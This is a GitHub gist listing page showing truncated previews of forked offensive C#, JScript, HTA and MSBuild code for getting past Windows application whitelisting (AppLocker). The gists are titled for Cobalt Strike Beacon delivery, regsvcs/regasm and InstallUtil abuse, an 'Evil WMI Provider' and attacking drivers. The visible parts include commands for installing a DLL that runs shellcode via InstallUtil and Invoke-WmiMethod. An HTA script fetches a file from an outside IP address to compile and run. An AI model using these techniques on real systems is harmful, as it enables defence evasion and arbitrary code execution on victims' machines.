Daniel DanielRTeixeira
DanielRTeixeira
/ execalc.cs
Created
November 2, 2017 15:25
— forked from nicholasmckinney/execalc.cs
Module Initializer ShellCode Example
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
DanielRTeixeira
/ beaconPayload.cs
Created
November 2, 2017 15:25
— forked from nicholasmckinney/beaconPayload.cs
Application Whitelisting Evasion With Beacon - Cobalt Strike - Sample
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
DanielRTeixeira
/ dynwrap.js
Created
November 2, 2017 15:25
— forked from nicholasmckinney/dynwrap.js
RegistrationFree DynamicWrapperX
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var actCtx = new ActiveXObject( "Microsoft.Windows.ActCtx" ); | |
| actCtx.Manifest = "C:\\Tools\\COM\\dynwrap.test.manifest"; | |
| try | |
| { | |
| var DX = actCtx.CreateObject("DynamicWrapperX"); | |
| DX.Register("user32.dll", "MessageBoxW", "i=hwwu", "r=l"); // Register a dll function. | |
| res = DX.MessageBoxW(0, "Hello, world!", "Test", 4); // Call the function. | |
| } | |
| catch(e){ WScript.Echo("Fail");} |
DanielRTeixeira
/ regsvcs.cs
Created
November 2, 2017 15:25
— forked from nicholasmckinney/regsvcs.cs
Application Whiltelisting Bypass - regsvcs/regasm
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.EnterpriseServices; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause | |
| Create Your Strong Name Key -> key.snk |
DanielRTeixeira
/ EvilWMIProvider.cs
Created
November 2, 2017 15:25
— forked from nicholasmckinney/EvilWMIProvider.cs
Evil WMI Provider
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Based On LocalAdmin WMI Provider by Roger Zander | |
| // http://myitforum.com/cs2/blogs/rzander/archive/2008/08/12/how-to-create-a-wmiprovider-with-c.aspx | |
| // Adapted For Evil By @subTee | |
| // Executes x64 ShellCode | |
| // | |
| // Deliver and Install dll | |
| // C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /i EvilWMIProvider.dll | |
| // Invoke calc for SYSTEM level calculations | |
| // Invoke-WmiMethod -Class Win32_Evil -Name ExecShellCalcCode | |
| // Invoke-WmiMethod -Namespace root\cimv2 -Class Win32_Evil -Name ExecShellCode -ArgumentList @(0x90,0x90,0x90), $null |
DanielRTeixeira
/ mimic.cs
Created
November 2, 2017 15:25
— forked from nicholasmckinney/mimic.cs
WMI execution via C#
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Management; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause | |
| Step One: | |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe mimic.cs | |
| Step Two: | |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U mimic.exe |
DanielRTeixeira
/ DynamicWrapperCS.cs
Created
November 2, 2017 15:25
— forked from nicholasmckinney/DynamicWrapperCS.cs
Dynamic Wrapper 1.1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Reflection; | |
| using System.Reflection.Emit; | |
| using System.Runtime; | |
| using System.Text; | |
| using System.Runtime.InteropServices; | |
| using System.EnterpriseServices; | |
| using ComTypes = System.Runtime.InteropServices.ComTypes; | |
DanielRTeixeira
/ kernel.xml
Created
November 2, 2017 15:25
— forked from nicholasmckinney/kernel.xml
Blog Post Code - Attacking Drivers with MSBuild.exe.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe kernel.xml --> | |
| <Target Name="Hello"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask | |
| TaskName="ClassExample" |
DanielRTeixeira
/ InstallUtil.hta
Created
November 2, 2017 15:25
— forked from nicholasmckinney/InstallUtil.hta
Download And Compile
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <script> | |
| //Set your settings | |
| var strFileURL = "http://192.168.56.103/execalc.html"; | |
| var oTest = new ActiveXObject("wscript.shell"); | |
| var pathTest = oTest.ExpandEnvironmentStrings("%USERPROFILE%") + "\\Downloads\\execalc.html"; | |
| var strHDLocation = pathTest; |
DanielRTeixeira
/ Win10Bypass.cs
Created
November 2, 2017 15:25
— forked from nicholasmckinney/Win10Bypass.cs
Windows 10 Prototype Bypass Applocker
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause | |
| Step One: |